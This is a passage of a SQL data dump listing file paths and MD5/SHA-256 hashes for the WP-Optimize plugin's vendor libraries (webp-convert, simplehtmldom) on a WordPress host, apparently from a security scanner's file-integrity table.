261,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/GraphicsMagick.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/GraphicsMagick.php',1,0x00000000000000000000000000000000,0x7CDDAD237A1082E16BA4C16F5ADAD89B,0x23C5134339AF3897C1C5F774E5734E3084F37BAD0DF2919642354F969C33F1C6,'',0,'?'),(0xB8ADD8CF47B3ADE5F793D615BD0C54B8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ImageMagick.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ImageMagick.php',1,0x00000000000000000000000000000000,0x7F405D0330AB2560F8121A71B7155F78,0xEF4E63C67B912928FE4967E49DBA689AB8078FE23462F7907F74C855CC7A9AE2,'',0,'?'),(0x5816F3E4D7885EEEAD912EBB6B43A5E8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Imagick.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Imagick.php',1,0x00000000000000000000000000000000,0x86EE1700F2EFEE5A35D9608372B31100,0x34546EBCE1FDA489A55BBCD068BB8B286E7219532E823D29D091A0F34D624721,'',0,'?'),(0xE47AF24B855BF49918F735AB7254666B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ImagickBinary.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/ImagickBinary.php',1,0x00000000000000000000000000000000,0x9EF612F9B1C79D27BF2DA9D4AF668946,0x3C980B1441A87533A1E225C189E064FBC8A6DD2AB372BC1037B6174B90EBABD8,'',0,'?'),(0x81187D3A62D6B9413532BB047297B65B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Stack.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Stack.php',1,0x00000000000000000000000000000000,0x25CD5BA26324CB7ABD0B21AFF445A222,0x9DC99093D8AE9AB2DFE244B8BC9F806AFBAA2F2351A4071717D95B9278F1FF73,'',0,'?'),(0x36C0B1824EE60FEB41BD081670EBC35D,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Vips.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Vips.php',1,0x00000000000000000000000000000000,0x5322F3E4B2C649658E91BF783229481D,0xCDBA8A2714FB5819FCAA5D075A35C6E82ACE495C9573C42B8B75D78B479FEE39,'',0,'?'),(0xAB1CC6748BE76F8CC08CB83C4D1D5078,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Wpc.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Converters/Wpc.php',1,0x00000000000000000000000000000000,0xC74ADC28F554BA2D51938F96DB9C06FD,0x6415B9824A63501F8168D00E55457FCD3AD5DA7FE1D5FF1275896B8CC2699691,'',0,'?'),(0xC189D094BC5A369E0A40705F31DB838C,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConversionSkippedException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConversionSkippedException.php',1,0x00000000000000000000000000000000,0x547DABD49ECEF228824A993A86B26077,0x1AC50315B7458C6D7D3DE1AAFFA12C955CB1671D089B5CE0BAE412B15420C83F,'',0,'?'),(0xF787C588028C558EA45FBEC2582EEF3F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperational/InvalidApiKeyException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperational/InvalidApiKeyException.php',1,0x00000000000000000000000000000000,0xC9A67DC9F68BDADDB8FFD21F6A873693,0x9094ABFC0AF9D679CAF77D54CADDBF0FAC3EBC1EDDFE1B42DAA539308D8E2837,'',0,'?'),(0xCB5A1FA4AA73BACA9CD9C1EAB5378293,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperational/SystemRequirementsNotMetException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperational/SystemRequirementsNotMetException.php',1,0x00000000000000000000000000000000,0xF0D2BDD510F79F1E0C462B45F6442A5E,0xBD6300FDDC5C9378ECE6CFF1250176E300DD153D280A0A69DC73DEDFCE59D7C2,'',0,'?'),(0x7BEFB9B4F1A7B698EBB99194200561CD,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperationalException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/ConverterNotOperationalException.php',1,0x00000000000000000000000000000000,0x905AF3C02D27CB7A05797329F43D9883,0xA83CDB7F2E8F93A36AC52ECE41E649152F976B9240C15A2417A7324F57AF5E92,'',0,'?'),(0x71B3ED380F4AC4A448ED169477701555,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblems/CreateDestinationFileException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblems/CreateDestinationFileException.php',1,0x00000000000000000000000000000000,0xF75F5A1DCDD97B43A5307728C6E7DA2D,0x644FBFEB889EB85DFBAFD9FFF01FAC62623E243684E52D05AF3FE75A058CFE2B,'',0,'?'),(0x98502CCF0D8BB553D93ECC98E9887D9B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblems/CreateDestinationFolderException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblems/CreateDestinationFolderException.php',1,0x00000000000000000000000000000000,0xB84A235452FAE516781D402453FF4248,0x7845F17F81D02742D6EB3D093306B69578DF49CA357F93613958D74C5CC5BFFC,'',0,'?'),(0x6658F168E2BDE3D3C78D4C59EF6AB3E8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblemsException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/FileSystemProblemsException.php',1,0x00000000000000000000000000000000,0x61A0ADDB540243E135ABC60BACCBFA9B,0xE0DA4F713ACD81A47D1AD63AF978388F3ED5E6E535CCED3E2503F989E5D7F7E5,'',0,'?'),(0xF594BF6B56D63709FAF68053EF2AC8AB,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/ConverterNotFoundException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/ConverterNotFoundException.php',1,0x00000000000000000000000000000000,0xBCE470831342E905E08167DBE449BDF6,0xCCF89251E879182C6684A4C588C2A1E8A5E8F75DD9266253E8977CCD6D99E5D6,'',0,'?'),(0x7A5A618F8905E96839569D1BB3ED2716,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/InvalidImageTypeException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/InvalidImageTypeException.php',1,0x00000000000000000000000000000000,0x2B7F6F71CE0CD65289F2CA18765FA308,0x62F427010C6C87D8689FF8AD7733DCEBEEF2B53A48F3A1656A19C398789C43E5,'',0,'?'),(0x5B478EAA5D9C7E248B2A32A545021058,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/TargetNotFoundException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInput/TargetNotFoundException.php',1,0x00000000000000000000000000000000,0xBF10B329BC5394BF0783476167A056BC,0xC87C2781FE145FCE508D439F7A0F0595B32CBC46A381D7137B5366B932A7103D,'',0,'?'),(0xF8BBC030A3A2504AE352651029B25845,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInputException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailed/InvalidInputException.php',1,0x00000000000000000000000000000000,0x87FD6A412C416DCC8A02C8E4821483A2,0x4395932EF521969AE2BE8240BB5CD843C62E0556A61DB95678527B4D250FCB05,'',0,'?'),(0xA6350AD9AAD7920CADAD621594E697D4,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailedException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Exceptions/ConversionFailedException.php',1,0x00000000000000000000000000000000,0x81882F8E09F5F53873624EC8AB98E691,0xC17C27D7606D9568CD1169322164B82841C7383100AE58BA2E09B897AFEFB8BB,'',0,'?'),(0x695427A83DB9EBB48184E46228121906,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Helpers/JpegQualityDetector.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Helpers/JpegQualityDetector.php',1,0x00000000000000000000000000000000,0xE772D9C30E5E3308A70EA45B2BA3CDAD,0xCE5F42FBBD56A85FA7C943E5727472DB64B5B2763E464BCB36138C32C870B1DD,'',0,'?'),(0x125227DE32F7A9F144B49E2EEB9DE5B1,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Helpers/PhpIniSizes.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Convert/Helpers/PhpIniSizes.php',1,0x00000000000000000000000000000000,0x870454C697DD877BE3BC093ACF5ED459,0x4EC0285E13B4F0F7287A31C9E6037FA1E05F6FBF6D0B0B135262164EE19B8CF7,'',0,'?'),(0x9326E5A6D197CCF400A8AEEFA4DCE81C,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInput/InvalidImageTypeException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInput/InvalidImageTypeException.php',1,0x00000000000000000000000000000000,0x1E3653589C661C8DAFB87D9BB1FAD6BF,0x3B81E9D30628C64213CA64A7E92DBA2690223C39581F73A7CEDDD449A294D451,'',0,'?'),(0x7532CBC29A0B74A3225B8CFC33CA235B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInput/TargetNotFoundException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInput/TargetNotFoundException.php',1,0x00000000000000000000000000000000,0x7EF761EF85794FD463290D46E148C722,0xAFAA49D1CDF63FD4964062119BC94AE120BB8469FCD6BEA7AE291A05112B5FB4,'',0,'?'),(0x507DB37641DD7AE28E3E30E98E12312C,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInputException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/InvalidInputException.php',1,0x00000000000000000000000000000000,0x6583B619E02FD7872B40997AD29FFAE9,0xDDC88E226091659836919C14E38AA5417BAEF5B7E147A95A36ED5BFCF36A7550,'',0,'?'),(0xD83D2357134457AEEBFCC3636BD26E22,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/SanityException.txt','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/SanityException.txt',1,0x00000000000000000000000000000000,0x7F79F83EEA64E462C8E1005487121599,0x2549EFCF007429FE649A2B0B2C86B0FE551057EE2854CEFCBB011FD6FB27BE63,'',0,'?'),(0x2CB785FF0A0F30D1192053BC87EE4389,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/WebPConvertException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Exceptions/WebPConvertException.php',1,0x00000000000000000000000000000000,0x352D4B74E1EEFE2B73454D3BC2C38F36,0xFFEF02995B30E27CD9EC84A79AB9419F418EC00593552D61860984C9629D58C1,'',0,'?'),(0x7A89A61B4F692E3F18EE0EDE51B993F7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/InputValidator.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/InputValidator.php',1,0x00000000000000000000000000000000,0xB7555C9AF587F867E410DD00ED0072B6,0xA5C09BF4A67B7BF65F27532DD5E35F6A8CDDABBED0CC6721E408D77B06881CEF,'',0,'?'),(0x1C0486F7AF858CDFC2CC52C32B9B5F28,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/MimeType.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/MimeType.php',1,0x00000000000000000000000000000000,0xEBCA90A3147B0EA5D8EAF860DE0510FD,0xF7EA53D0972FD34EC358A0BB05D555A1D1A756E24505041488D66996241CB8E3,'',0,'?'),(0x623505CFD257E815DAD840DEEBD2D9E0,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/PathChecker.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/PathChecker.php',1,0x00000000000000000000000000000000,0x1F4E31EB50F568F3BCAE79B0902C68C4,0x9CA234E9F44FE41614CF7E48DA6151DCB2C01DB07FAD7CA70D7E61672DB5D26E,'',0,'?'),(0x681F3A860575D566E5EB879DFA5F59BF,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/Sanitize.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/Sanitize.php',1,0x00000000000000000000000000000000,0x0280F97EE8B4A1A5C408B60E0A007D1A,0x3D160B53097D0A247C4671488BB4D07B86AE5628AE4F2FC84A06EA582BFE8795,'',0,'?'),(0xA1649ACFEADB5F10AA8D0CDA043419D7,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/SanityCheck.txt','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Helpers/SanityCheck.txt',1,0x00000000000000000000000000000000,0x89840DF9350B7C236C701EE85332DD71,0x7CC4A0511081B38406498A58F7B7B60CA1957B605EB147C1BE110405D2D67BE7,'',0,'?'),(0x91047A6BF21FE9D8D92250A86487D28D,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/BaseLogger.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/BaseLogger.php',1,0x00000000000000000000000000000000,0x5A560A93434555830CA36E9FC17A41C2,0xD3581C8AACE9E1309ACC829E864000BD40F7F395EA8D5AA9C099C6D84A0CBAC3,'',0,'?'),(0x1D01B281E2FBC8E3921D5F110DEF16DE,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/BufferLogger.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/BufferLogger.php',1,0x00000000000000000000000000000000,0xDF0D1650FDF7C2D499724E4E5487B0E8,0x4C258AD9ED195A6B04A805A2066AE7F517DF51392FF69CC457BFFA08B0590859,'',0,'?'),(0x76AA6F7A034DD1BEDE9236E261E7249E,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/EchoLogger.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Loggers/EchoLogger.php',1,0x00000000000000000000000000000000,0x79B3EC50DACF7F0FD482E95021B93EC5,0x8AB545D90FCB27427146835CE7F64D82FBA24D197301F3FE6114F3C0403EAC62,'',0,'?'),(0x1B691E28637189198E5AEDA135F90BC8,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/ArrayOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/ArrayOption.php',1,0x00000000000000000000000000000000,0xBF29A2166227EF96E8ED78A336D99105,0xC146B59D5314756C3F72B222BFF6B502E9C7C351F37CA84535EB61A7B3964783,'',0,'?'),(0x663FD9D3390721CF04CEB96E6859F4AF,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/BooleanOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/BooleanOption.php',1,0x00000000000000000000000000000000,0xDEC9C7A49E582A3C7660B5C33B76F961,0x8C75C2E23EBC2C2F4463DBC8DFAEBD86FDB80081B23CAAC436AA7265573CF83B,'',0,'?'),(0x962A9A368EA0834D374F1EA962DE2809,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/InvalidOptionTypeException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/InvalidOptionTypeException.php',1,0x00000000000000000000000000000000,0xC031AF8BDE78D08B072854E3691616B6,0x78D326119029CB14399EC9FB0B9D50335597397A253EAFB672F30D70F57FD54E,'',0,'?'),(0x604B90515A05373A5D632B2DD6111747,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/InvalidOptionValueException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/InvalidOptionValueException.php',1,0x00000000000000000000000000000000,0x3ECFAC8A112C8967EA600E01203F89EE,0x091C3D6F699D72CF5AD7803EFD60732DFE691D906255AC58744F629FB8C72588,'',0,'?'),(0xEC8449DE7D19AE9F4B3A0712EBF8E068,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/OptionNotFoundException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Exceptions/OptionNotFoundException.php',1,0x00000000000000000000000000000000,0xDF810C6B3EDE8AEDC02040D4F3E08836,0xF3F0C15A2972C84A790D3D44378FBC983A5CD41664F23639987D8C414A7DAF7D,'',0,'?'),(0xC9188FF41E6BCC867D0243057FD168D4,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/GhostOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/GhostOption.php',1,0x00000000000000000000000000000000,0x08CBCBFF563A1CB59526CC3945CD0A55,0xDAE21499F87C95BAFC39B5E72ACD1F092FB07E883FF3EDD480C981D8AD292FF5,'',0,'?'),(0x2E79FF43F572D993DB43F76DBC429A67,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/IntegerOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/IntegerOption.php',1,0x00000000000000000000000000000000,0x2C274E769B7F594B252E0C9B6FDBA687,0x9AEC0960F2CC762258E71BFEC510B835CF670C401D11FF51079C9E9F12223684,'',0,'?'),(0xDBD7D46FF0BFDA459DF7675D611AD0EB,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/IntegerOrNullOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/IntegerOrNullOption.php',1,0x00000000000000000000000000000000,0x8CDFD775F89EF4B634BEF55AE027AADC,0x6EC164CA183FEC622DA9E50CC59AD7AF215EFE9C13F6E93C6A6FC4585D9EE542,'',0,'?'),(0xB71AC523F2106F38171D426765D63161,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/MetadataOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/MetadataOption.php',1,0x00000000000000000000000000000000,0xAC2DF71B1D7CAB7E86D0CC7CA26F9327,0x721B73A9A40BDE4E9021E0FD671BFDB38AFAD99AA15232E1F8147E0F5F129E14,'',0,'?'),(0x3AA9D11EE4BD6D01AE045940CE65B03A,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Option.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Option.php',1,0x00000000000000000000000000000000,0x573F9243E4863956C80F573FF97D9D7B,0x31D3FC213248BAFEEF6693C18E07F725C5F71C92A92827B9F2AC94BF3838E2CD,'',0,'?'),(0x80AEF611656D1F67D9A9B4E7DCFBCA23,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/OptionFactory.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/OptionFactory.php',1,0x00000000000000000000000000000000,0x68578D4D800961A9750E3C87AF4E4741,0x0E847D27EA06A80AA360EE5A7568488183442E5F0A76162F387D664432C25B1D,'',0,'?'),(0xF26A992F2F6991E7CC9F0AE5BC2A9652,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Options.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/Options.php',1,0x00000000000000000000000000000000,0x1D5B660E979178D3D4DC65C10F8E6D90,0x55616D54E95E045D942B6110CE2A6F71BE1E43C22758DBCFB6E4650761A9629A,'',0,'?'),(0x0A3BD952C4F320F20D781D9745C31859,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/QualityOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/QualityOption.php',1,0x00000000000000000000000000000000,0xB2732E9A4F4C7CDB2044AD2CA0C26117,0x9B548F5BE13008009F88950F1AC24C4D596BDC15D9B6F30D2B001BE95E246E2E,'',0,'?'),(0xCE22175B8A0FE79312EDCF4C63947FCF,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/SensitiveArrayOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/SensitiveArrayOption.php',1,0x00000000000000000000000000000000,0x8FB6EBAD00F2695E447137D335B017A1,0xE52F6FC12212EBA478910A9ECD09234916A7434EFBC5B2C913E156E348064471,'',0,'?'),(0x1AADC9175E631F19763146DB73DFBCBD,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/SensitiveStringOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/SensitiveStringOption.php',1,0x00000000000000000000000000000000,0xBD9FB0D1315D5D0367C2474CBFBA788A,0x76C0F107D2E3AEC370E4EC33E49E3AE838F128AFE70883E4F77E203AE755F5F1,'',0,'?'),(0xE4CD1DD57A53C64F0A03E1A277C9FFFD,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/StringOption.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Options/StringOption.php',1,0x00000000000000000000000000000000,0xC6F45DBA31085FAD352F2E330966367A,0x536305FA87031B4F12A01D0BFE3919EEC166A77F38A926535B117C1774AB8988,'',0,'?'),(0xA7DBA218E7D8873DFE705511F606FA07,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Exceptions/ServeFailedException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Exceptions/ServeFailedException.php',1,0x00000000000000000000000000000000,0x18A2CAF3AD1202FD23AD40B9E010482F,0xD524DF1A407F7398E87D12C56A865FCF8109801C8F11C805894D630357E2B282,'',0,'?'),(0xA23998DB70F240EF68B4346D59784A15,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Header.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Header.php',1,0x00000000000000000000000000000000,0x61A99A0B43BCAE2D48180D1830B01A43,0x7BEF9BF66A7E9FB3E4889BB2096A609587EA12167149F926536A5EC9B92A1FFE,'',0,'?'),(0x2A33E7A9EE2CC95F5793CA716072EF5F,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Report.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/Report.php',1,0x00000000000000000000000000000000,0xAD95085CAD17C3303A193E084BDA7087,0x5B8C0BE47BC17CA372C46B7BD093A82F4A0ACB97AE537BDB103346E63DE0DEB0,'',0,'?'),(0x50CECAFF1D874A324E42683B3803D90B,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeConvertedWebP.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeConvertedWebP.php',1,0x00000000000000000000000000000000,0x537AC4D47277DC560105DA0310F95216,0x0BA69E2A6840C89D4250E459414438CD83A1D5734BDD4E740036F8DEEAE8E0A8,'',0,'?'),(0x6E124E12D7E2A3A5105C44F2AF775FD3,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeConvertedWebPWithErrorHandling.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeConvertedWebPWithErrorHandling.php',1,0x00000000000000000000000000000000,0x5D4D95A23599EF2BE35B899B31B6721B,0x01764FDF11E63297EF7A783CBB172E4443E3F8357F33D3FFA5F49706E0BD7FC7,'',0,'?'),(0x7B84F9B00E0CA5812C1F1AC831163602,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeFile.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/Serve/ServeFile.php',1,0x00000000000000000000000000000000,0xAA5647D1B3B6AD91F0534C33C8EADF48,0x613BE527699C823059025B9C51ADE3E6A54D0C9303B8273139E6EBEF3441C51F,'',0,'?'),(0x239A3DC4E2072DA0308D446D7C812BA6,'wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/WebPConvert.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/rosell-dk/webp-convert/src/WebPConvert.php',1,0x00000000000000000000000000000000,0x5AF6166D143AC82B37713570F33484A7,0x75E41FF5516E12F11EE1AA6AC2D30E794703D86C9F67A0CB3716C8AC265C6A09,'',0,'?'),(0x5B46A5F88DD41684590A40640123FA62,'wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/CHANGELOG.md','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/CHANGELOG.md',1,0x00000000000000000000000000000000,0xA895B9F50E7938969B5E8AB965F6607B,0x84D8E93BE0B0155E2C190F1E9995AFAF9EF6A11773307F2E3ABC56CBEFD36085,'',0,'?'),(0x957372F1302F79024A147B8C3152A601,'wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/Debug.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/Debug.php',1,0x00000000000000000000000000000000,0xEE7F9985264A5D6B268474C2ABBBFB5A,0x221BDBC8E33DD456ACEA7D106FFC0D64D2AA31E24BE9EA57F1840C90A8607BA6,'',0,'?'),(0x166DB9B33427995E245129524958BAE2,'wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlDocument.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlDocument.php',1,0x00000000000000000000000000000000,0xB3101287924347568CAD60312BDE0E1A,0x34BCD280FAF4B759C3B644FDCCCD6A91C5E5F1DBA3E128797485FC029DBE41EE,'',0,'?'),(0xC292F29B7446C386EECAF70CF92745EE,'wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlElement.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlElement.php',1,0x00000000000000000000000000000000,0x932AEC3A32EAC66F1A31C8DD6B4EF7AF,0xDE4629518E9319E9C317484F8B3C938FDA4734ECF530769688B3A50559A0F8A7,'',0,'?'),(0x2D86E0B9027DC77A1E216E7BC771AB7F,'wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlNode.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/simplehtmldom/simplehtmldom/HtmlNode.php',1,0x00000000000000000000000000000000,0xF6B35340434E67D4B084FCD5FAE2F348,0xA9F6908BE8ACCC51B98126F19B66602E612DCB0B827B8EE3DE7FD84C4DC211D7,'',0,'?'),(0x179FA2C545254EF0DBF206B3902F5F62,'wp-content/plugins/